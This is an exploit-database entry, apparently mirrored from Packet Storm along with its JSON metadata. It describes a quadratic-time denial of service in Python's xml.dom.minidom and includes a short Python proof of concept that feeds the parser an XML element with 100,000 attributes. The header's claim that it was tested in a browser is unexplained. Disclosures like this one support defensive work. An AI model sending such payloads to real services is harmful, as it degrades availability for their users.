📄 Python 3 Minidom Denial of Service_PACKETSTORM:215747

Description

This proof of concept demonstrates an algorithmic denial of service condition caused by parsing an XML document containing an extremely large number of attributes using Python's xml.dom.minidom library. Due to inefficient attribute handling with...

Visit Original Source

Basic Information

ID PACKETSTORM:215747

Published Feb 17, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : python3 minidom Algorithmic Denial of Service (DoS) via Excessive XML Attributes |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://www.python.org/ |
=============================================================================================================================================

[+] Summary : This proof of concept demonstrates an Algorithmic Denial of Service (Algo-DoS) condition caused by parsing an XML document containing an extremely
large number of attributes using Python’s xml.dom.minidom library. Due to inefficient attribute handling with quadratic time complexity, the XML parser may
consume excessive CPU resources, leading to severe performance degradation or service unavailability. The issue becomes critical when untrusted XML input is
processed without proper size limits or resource controls.
This behavior does not result in code execution but represents a significant availability risk for applications relying on vulnerable XML parsing mechanisms

[+] POC :

import xml.dom.minidom
import time

def trigger_dos_vulnerability():
count = 100000
payload = '<?xml version="1.0"?><root ' + ' '.join([f'attr{i}="v"' for i in range(count)]) + ' />'
print(f"[*] Attempting to process {count} attributes...")
start_time = time.time()
try:
xml.dom.minidom.parseString(payload)
end_time = time.time()
print(f"[+] Processing completed successfully in {end_time - start_time:.2f} seconds.")
print("[!] The system might not be vulnerable, or the input is insufficient for a crash.")
except Exception as e:
print(f"[-] An error occurred during processing: {e}")

if __name__ == "__main__":
trigger_dos_vulnerability()

Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================

{
    "lastseen": "2026-02-17T18:11:47",
    "description": "This proof of concept demonstrates an algorithmic denial of service condition caused by parsing an XML document containing an extremely large number of attributes using Python's xml.dom.minidom library. Due to inefficient attribute handling with...",
    "published": "2026-02-17T00:00:00",
    "modified": "2026-02-17T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Python 3 Minidom Denial of Service",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215747",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : python3 minidom Algorithmic Denial of Service (DoS) via Excessive XML Attributes                                            |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |\n    | # Vendor    : https://www.python.org/                                                                                                     |\n    =============================================================================================================================================\n    \n    \n    [+] Summary    : This proof of concept demonstrates an Algorithmic Denial of Service (Algo-DoS) condition caused by parsing an XML document containing an extremely \n                     large number of attributes using Python\u2019s xml.dom.minidom library. Due to inefficient attribute handling with quadratic time complexity, the XML parser may \n    \t\t\t\t consume excessive CPU resources, leading to severe performance degradation or service unavailability. The issue becomes critical when untrusted XML input is \n    \t\t\t\t processed without proper size limits or resource controls. \n                     This behavior does not result in code execution but represents a significant availability risk for applications relying on vulnerable XML parsing mechanisms\n      \n    [+] POC :   \n    \n    import xml.dom.minidom\n    import time\n    \n    def trigger_dos_vulnerability():\n        count = 100000 \n        payload = '<?xml version=\"1.0\"?><root ' + ' '.join([f'attr{i}=\"v\"' for i in range(count)]) + ' />'\n        print(f\"[*] Attempting to process {count} attributes...\")\n        start_time = time.time()\n        try:\n            xml.dom.minidom.parseString(payload) \n            end_time = time.time()\n            print(f\"[+] Processing completed successfully in {end_time - start_time:.2f} seconds.\")\n            print(\"[!] The system might not be vulnerable, or the input is insufficient for a crash.\")\n        except Exception as e:\n            print(f\"[-] An error occurred during processing: {e}\")\n    \n    if __name__ == \"__main__\":\n        trigger_dos_vulnerability()\n    \t\n    \t\n    Greetings to :======================================================================\n    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\n    ====================================================================================",
    "sourceHref": "https://packetstorm.news/download/215747",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215747/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply